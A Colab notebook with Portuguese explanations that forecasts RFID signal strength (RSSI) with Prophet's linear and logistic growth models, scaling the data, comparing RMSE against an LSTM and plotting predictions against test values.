# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="UmSvIR17HH39" executionInfo={"status": "ok", "timestamp": 1607191306292, "user_tz": 180, "elapsed": 805, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="45ca8e9b-8c9f-4cc7-9ddc-6f70826913eb"
# Copy the test set (so the original stays unscaled) and scale its target with
# the train-fitted scaler, putting it on the same 0-1 scale as the forecast.
df_test_2 = df_test.copy()
df_test_2['y'] = scaler.transform(df_test[['y']])
df_test_2.head()
# + [markdown] id="3HAE8VqFcBXF"
# A métrica foi gerada a partir de um modelo treinado com valor escalonado a de 0 a 1, tornado-se possível realizar a comparação entre o resultado do modelo LSTM, pois ambos estão na mesma escala.
# + colab={"base_uri": "https://localhost:8080/"} id="kKQ7-fmNHqzd" executionInfo={"status": "ok", "timestamp": 1607191445020, "user_tz": 180, "elapsed": 982, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d18aada0-9cc7-4883-ad4d-f1ba52fc9df5"
# RMSE on the scaled (0-1) values, comparable with the LSTM metric. The slice
# takes the last test_size forecast rows; column -1 of Prophet's output is
# presumably 'yhat' -- confirm against forecast.columns.
rmse = sqrt(mean_squared_error(df_test_2.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + [markdown] id="vU4pm-OqcaQF"
# Para poder se exibir a distribuição dos valores reais com os valores previstos, geraram-se datasets adicionais, baseados nos datasets de treino, teste e previsão, com índices similares para facilitar a distribuição, além de os valores de y terem sido desescalonados, mostrando assim os valores na grandeza original.
# + id="ekHHhhul6u3e" executionInfo={"status": "ok", "timestamp": 1607191461295, "user_tz": 180, "elapsed": 985, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Build display copies with contiguous indices (test continues after train) and
# map y/yhat back to the original RSSI scale for plotting.
df_train_show = df_train.reset_index(drop=True)
df_test_show = df_test_2.reset_index(drop=True)
df_test_show.index = df_test_show.index + len(df_train)
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + [markdown] id="vyg27H0RdCJ5"
# Pode-se observar no gráfico gerado, em azul uma distribuição dos valores de treino, em laranja os valores de teste e em verde os valores de teste previstos.<br>
# Pode-se observar que o modelo linear gerou uma previsão com aspecto horizontal, demonstrando pouco ou nenhum crescimento (positivo ou negativo) dentro da faixa observada.
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="v5SHR13C52Mi" executionInfo={"status": "ok", "timestamp": 1607191625150, "user_tz": 180, "elapsed": 1582, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="5aeffef7-c893-409f-d80d-22f71a31152f"
# Plot the train tail, the first 200 test points, and the matching predictions
# (all de-scaled, on aligned indices).
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="GQIrNXvdh8J7"
# #### Prophet com crescimento logístico
# + [markdown] id="NImw3uphh8D-"
# Para o segundo cenário analisado, utilizou-se o modelo de **crescimento logístico**, sendo que este modelo é utilizado quando há a mudança de tendência, de crescimento para decaimento e vice-versa e quando o crescimento é não-linear com saturação.<br>
# Este modelo precisa receber adicionalmente, além de ds (data stamp) e y (VALIDATION), os valores de **cap** (limite superior de saturação da tendência) e **floor** (limite inferior de saturação da tendência).<br>
# O dataset precisa ter um valor de cap e um de floor para cada observação registrada, podendo ser igual para toda a série ou variável para cada observação.<br>
# Estes limites devem ser aplicados, pois o modelo logístico considera que a tendência não deve seguir ao infinito, tendo assim um limite inferior e superior.<br>
# O crescimento não linear do modelo logístico se inicia com um crescimento aproximadamente exponencial, quando a saturação se inicia, o crescimento passa por uma tendência linear e no estágio de maturidade, o crescimento para.
# + [markdown] id="FPsVAoI0Lqg8"
# ##### *Prophet com crescimento logístico, RSSI max como cap e RSSI min como floor*
# + [markdown] id="_1gN2rDei6QR"
# Para o primeiro teste com modelo de crescimento logístico, utilizou-se os valores de RSSI máximo (MAX) e mínimo (MIN) registrado para cada tag de RFID lida como o valor de cap e floor.<br>
# Para o dataset criado, mantiveram-se as colunas de VALIDATION, TIMESTAMP, MIN e MAX, sendo que eles foram renomeados para y, ds, floor e cap respectivamente.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="Im8SNo49j6mi" executionInfo={"status": "ok", "timestamp": 1607191686297, "user_tz": 180, "elapsed": 995, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c3face41-9e2e-4fe0-928f-447a6e9338fd"
# Keep VALIDATION/TIMESTAMP/MIN/MAX and rename to the y/ds/floor/cap columns
# required by Prophet's logistic-growth model.
df_Prophet = df_original.drop(columns=['EPC', 'MEAN', 'COUNT']).rename(
    columns={'VALIDATION': 'y', 'TIMESTAMP': 'ds', 'MIN': 'floor', 'MAX': 'cap'}
)
df_Prophet.head()
# + [markdown] id="V1wWu0lcj6mn"
# Como havia inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="mm2IfXozj6mo" executionInfo={"status": "ok", "timestamp": 1607191693294, "user_tz": 180, "elapsed": 1043, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3e6d2530-64cd-4b92-a98d-29e2a58343df"
# Rebuild a contiguous 0..n-1 index (the original index had gaps).
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0])
df_Prophet
# + [markdown] id="vMKgd4uZj6mo"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="o1VCKazfj6mo" executionInfo={"status": "ok", "timestamp": 1607191702143, "user_tz": 180, "elapsed": 1096, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="190ae2c3-fe96-45b7-b86f-17e8378817e6"
# Overwrite ds with the synthetic 1 ms-resolution timestamp series.
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="qJz-hjxPj6mp" executionInfo={"status": "ok", "timestamp": 1607191707286, "user_tz": 180, "elapsed": 1001, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="6ce71566-cb08-4706-ca33-516560be958b"
# Restrict the analysis to the configured window (here: the whole dataset).
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="Wc97J6GPk8Jw"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100.
# + colab={"base_uri": "https://localhost:8080/"} id="FtfpERpwL6Kg" executionInfo={"status": "ok", "timestamp": 1607191716296, "user_tz": 180, "elapsed": 993, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ea876beb-3a7b-4778-f396-bc19557938a5"
# Same 80/20 chronological split as the linear experiment (shuffle=False keeps
# the time ordering; random_state is irrelevant without shuffling but kept for
# parity with the LSTM setup).
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="dg_3VtDemh48"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="aPwrG9ogL6Kg" executionInfo={"status": "ok", "timestamp": 1607191721327, "user_tz": 180, "elapsed": 1004, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d998f59e-248e-476b-fd93-db8aec7139fb"
# Fit a 0-1 MinMax scaler on the training target only (no test-set leakage)
# and scale the train 'y' in place.
df_train = df_train.copy()  # de-link from the split slice: avoids SettingWithCopyWarning
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="EdDx5BQBlpBG"
# Para manter-se a proporcionalidade dos valores, os valores de cap e floor foram escalonados com o escalonador treinado com os valores de VALIDATION do dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="nIhACOKrMvVg" executionInfo={"status": "ok", "timestamp": 1607191727722, "user_tz": 180, "elapsed": 1014, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4a222844-f807-43c5-aaa2-4cdeae900bb3"
# Scale cap/floor with the scaler fitted on y, keeping them proportional to the
# scaled target. (These per-row values are replaced by fixed constants in the
# next cell.)
df_train['cap'] = scaler.transform(df_train[['cap']])
df_train['floor'] = scaler.transform(df_train[['floor']])
df_train.head()
# + [markdown] id="ByLsjppSkzNf"
# Utilizou-se um valor fixo para cap e floor, sendo que como valor, selecionou-se o maior valor de MAX e o menor valor de MIN.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="zkGrH7I5M83l" executionInfo={"status": "ok", "timestamp": 1607191763883, "user_tz": 180, "elapsed": 986, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="0a154b1d-1679-4bf6-d926-7610f48adfe5"
# Collapse cap/floor to single fixed saturation limits: the overall maximum of
# MAX and minimum of MIN (in scaled units).
df_train['cap'] = df_train['cap'].max()
df_train['floor'] = df_train['floor'].min()
df_train.head()
# + [markdown] id="b2IApyQ5l5xL"
# Na criação do dataset **future**, gerou-se os periodos de tempo futuro conforme o tamanho do dataset de teste e adicionaram-se também as colunas de cap e floor, utilizando-se os mesmos valores adotados como cap e floor fixos para o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 470} id="du8y4W0yL6Kg" executionInfo={"status": "ok", "timestamp": 1607191802960, "user_tz": 180, "elapsed": 31446, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="fd66dcee-6ad6-488b-f235-99738ef15e34"
# Fit a logistic-growth Prophet model; the future frame must also carry the
# same cap/floor saturation limits used during training.
model = Prophet(growth='logistic')
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
future['cap'] = df_train['cap'].max()
future['floor'] = df_train['floor'].min()
future
# + [markdown] id="Wn-rabMcmb3R"
# O dataset de previsão (forecast) foi então gerado a partir do método predict do modelo treinado com crescimento logístico.
# + id="nmDBGsptNM3n" executionInfo={"status": "ok", "timestamp": 1607191827355, "user_tz": 180, "elapsed": 21212, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
forecast = model.predict(future)
# + [markdown] id="Mb-h3u7kmvVA"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuídos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência é o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="uE9_BgYPL6Kg" executionInfo={"status": "ok", "timestamp": 1607191834976, "user_tz": 180, "elapsed": 3232, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2b604888-cf06-4806-e499-c920db47e2d7"
# Forecast plot with detected changepoints overlaid, plus the component plots
# with their uncertainty intervals.
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="Z3DOztV9L6Kg" executionInfo={"status": "ok", "timestamp": 1607191846509, "user_tz": 180, "elapsed": 981, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2fd79788-e039-45b2-f49d-9295ed9f359d"
# Scale the test target with the train-fitted scaler so the RMSE below is
# computed on the same 0-1 scale as the forecast.
df_test = df_test.copy()  # de-link from the split slice: avoids SettingWithCopyWarning
df_test['y'] = scaler.transform(df_test[['y']])
df_test.head()
# + colab={"base_uri": "https://localhost:8080/"} id="wIFDshcTL6Kh" executionInfo={"status": "ok", "timestamp": 1607191887565, "user_tz": 180, "elapsed": 968, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4b14fd0d-b8b1-4ed1-f80e-0360e5edfc36"
# RMSE on the scaled values, comparable with the LSTM and linear-Prophet runs.
# Column -1 of Prophet's output is presumably 'yhat' -- confirm against
# forecast.columns.
rmse = sqrt(mean_squared_error(df_test.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + id="4NWO5f7qAjPQ" executionInfo={"status": "ok", "timestamp": 1607191893998, "user_tz": 180, "elapsed": 964, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Build display copies with contiguous indices (test continues after train) and
# map y/yhat back to the original RSSI scale for plotting.
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reset index to 0..n-1
df_test_show = df_test.copy()
df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # continue after the train index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + [markdown] id="ygxSCiKqk2xF"
# Por fim, comparou-se a distribuição dos valores reais e previstos da série.
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="ski9GcKoAjPR" executionInfo={"status": "ok", "timestamp": 1607191959498, "user_tz": 180, "elapsed": 1608, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b8e3ec83-9f59-4f4d-fa07-42d17c2b77f9"
# Plot the train tail, the first 200 test points, and the matching predictions
# (all de-scaled, on aligned indices).
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="vtL4kpfdCz4h"
# ##### *Prophet com crescimento logístico, VALIDATION max como cap e VALIDATION min como floor*
# + [markdown] id="Ce4fid0gbzet"
# Para o segundo teste com modelo de crescimento logístico, utilizaram-se os valores de máximo e mínimo de VALIDATION para cap e floor registrado para cada tag de RFID.<br>
# Para o dataset criado, mantiveram-se as colunas de VALIDATION, TIMESTAMP, MIN e MAX, sendo que eles foram renomeados para y, ds, floor e cap respectivamente.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="11BDwyqMCz4h" executionInfo={"status": "ok", "timestamp": 1607191979647, "user_tz": 180, "elapsed": 1032, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="33ee0b38-6e6f-4cfe-980d-88bce53af62d"
df_Prophet = df_original.drop(['EPC','MEAN','COUNT'], axis=1)
df_Prophet = df_Prophet.rename(columns={'VALIDATION': 'y','TIMESTAMP':'ds','MIN':'floor','MAX':'cap'})
df_Prophet.head()
# + [markdown] id="4le01kz4Cz4j"
# Como havia inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="O861R9GRCz4j" executionInfo={"status": "ok", "timestamp": 1607191983469, "user_tz": 180, "elapsed": 986, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2223ee7c-c2cc-42a3-b29e-943f2db72531"
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0])
df_Prophet
# + [markdown] id="LSHjiEWXCz4k"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="vUFs0_EbCz4k" executionInfo={"status": "ok", "timestamp": 1607191987383, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3b927cc3-daa6-428e-ab41-aa8e4bfa5f7c"
# Overwrite ds with the synthetic 1 ms resolution time index built earlier.
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="Tr5rGv6kCz4k" executionInfo={"status": "ok", "timestamp": 1607191989476, "user_tz": 180, "elapsed": 994, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8a990870-9eae-4737-b40e-1b9a1b2ae96a"
# Restrict the analysis to the observation window [min_period, max_period).
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="w-C_4N7pm0pp"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100.
# + colab={"base_uri": "https://localhost:8080/"} id="jgnbCmXaCz4k" executionInfo={"status": "ok", "timestamp": 1607191994674, "user_tz": 180, "elapsed": 1019, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="37f2ff3e-e227-491f-e3e6-849099193e4c"
# 80/20 chronological train/test split (shuffle=False preserves time order,
# mirroring the parameters used for the LSTM model).
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="0sOauQMsm3Ik"
# Para os valores de cap e floor, utilizaram-se os valores máximo e mínimo de y(t) do dataset de treino.
# + id="WoQXQamFEcg-" executionInfo={"status": "ok", "timestamp": 1607191999529, "user_tz": 180, "elapsed": 969, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Logistic-growth saturation limits taken from the training target itself.
df_train['cap'] = df_train['y'].max()
df_train['floor'] = df_train['y'].min()
# + [markdown] id="0RUPsGnPnD-f"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="WcbDWQBuCz4l" executionInfo={"status": "ok", "timestamp": 1607192003298, "user_tz": 180, "elapsed": 1010, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="5ea9e36d-e17e-4b94-c42a-4ffce0805d28"
# Fit a [0, 1] min-max scaler on the training target only; the same fitted
# scaler is reused later for the test set and forecast (no test-set leakage).
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="S5qoAOvMnLZu"
# Para manter-se a proporcionalidade dos valores, os valores de cap e floor foram escalonados com o escalonador treinado com os valores de VALIDATION do dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="hbAGMUI-Cz4l" executionInfo={"status": "ok", "timestamp": 1607192007394, "user_tz": 180, "elapsed": 991, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="06e30f48-134e-44c2-f393-54fedaaa0abe"
# Scale cap/floor with the scaler fitted on y so the bounds stay proportional.
df_train['cap'] = scaler.transform(df_train[['cap']])
df_train['floor'] = scaler.transform(df_train[['floor']])
df_train.head()
# + [markdown] id="PqegEXkTj7JM"
# Utilizaram-se os valores máximo e mínimo de VALIDATION para cap e floor do dataset future.
# + colab={"base_uri": "https://localhost:8080/", "height": 470} id="oc4ibOqwCz4m" executionInfo={"status": "ok", "timestamp": 1607192043046, "user_tz": 180, "elapsed": 20421, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="5fb83412-4c9c-4545-fa9a-618240c847b9"
# Fit a logistic-growth Prophet model, then build the future frame extending
# test_size steps at 1 ms frequency. Logistic growth requires cap/floor to be
# set on the future frame as well.
model = Prophet(growth='logistic')
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
future['cap'] = df_train['cap'].max()
future['floor'] = df_train['floor'].min()
future
# + id="5OwFkEbdCz4m" executionInfo={"status": "ok", "timestamp": 1607192068408, "user_tz": 180, "elapsed": 22258, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Forecast over the full future frame (training period + test horizon).
forecast = model.predict(future)
# + [markdown] id="sUesMB8GkKtO"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuidos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência são o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="wtNGuhSgCz4m" executionInfo={"status": "ok", "timestamp": 1607192070719, "user_tz": 180, "elapsed": 19054, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="bc183eb8-a2ff-451c-8eec-0de80afdf0fe"
# Forecast plot with detected trend changepoints, followed by component plots.
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + [markdown] id="iXPZeqYQnOwO"
# Para poder se avaliar a métrica da raíz do erro quadrático médio, escalonou-se também o dataset de teste, utilizando o escalonador gerado com o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="XC-YnBtICz4m" executionInfo={"status": "ok", "timestamp": 1607192081108, "user_tz": 180, "elapsed": 806, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9811c765-72c5-44e6-a8e2-1deb318761df"
# Scale the test target with the training scaler so RMSE is comparable.
df_test['y'] = scaler.transform(df_test[['y']])
df_test.head()
# + [markdown] id="E-O9QuRvkN1z"
# Com base nos valores previstos e os valores reais, calculou-se o valor de RMSE (Raíz do Erro Quadrático Médio).
# + colab={"base_uri": "https://localhost:8080/"} id="mAebJKAmCz4m" executionInfo={"status": "ok", "timestamp": 1607192104268, "user_tz": 180, "elapsed": 1016, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="76423e59-66e5-437d-adf1-79d8088792dc"
# RMSE between the scaled test values and the last test_size predictions.
# Positional access: column 1 of df_test is presumably y and the last column
# of Prophet's forecast frame is yhat — TODO confirm column order.
rmse = sqrt(mean_squared_error(df_test.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + id="8SWqUkpLCz4n" executionInfo={"status": "ok", "timestamp": 1607192119746, "user_tz": 180, "elapsed": 987, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Build display copies: make the train/test indices contiguous and invert the
# scaling so the plots show the original units again.
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reset index
df_test_show = df_test.copy()
df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # reset index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + [markdown] id="5S8kPCollJyg"
# Por fim, comparou-se a distribuição dos dados dos valores reais e previstos da série.
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="WIs2ev6bCz4n" executionInfo={"status": "ok", "timestamp": 1607192157585, "user_tz": 180, "elapsed": 1937, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="761e5fe5-095c-4072-909c-cff071e4f941"
# Overlay the tail of the training series with the first 200 test points and
# the 200 predictions covering the same positions.
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="e1KtdAwKGelo"
# ##### *Prophet com crescimento logístico, cap de -35 e floor de -40, utilizado de maneira empirica através da observação da distribuição dos dados de VALIDATION*
# + [markdown] id="N0-_DWIznfBz"
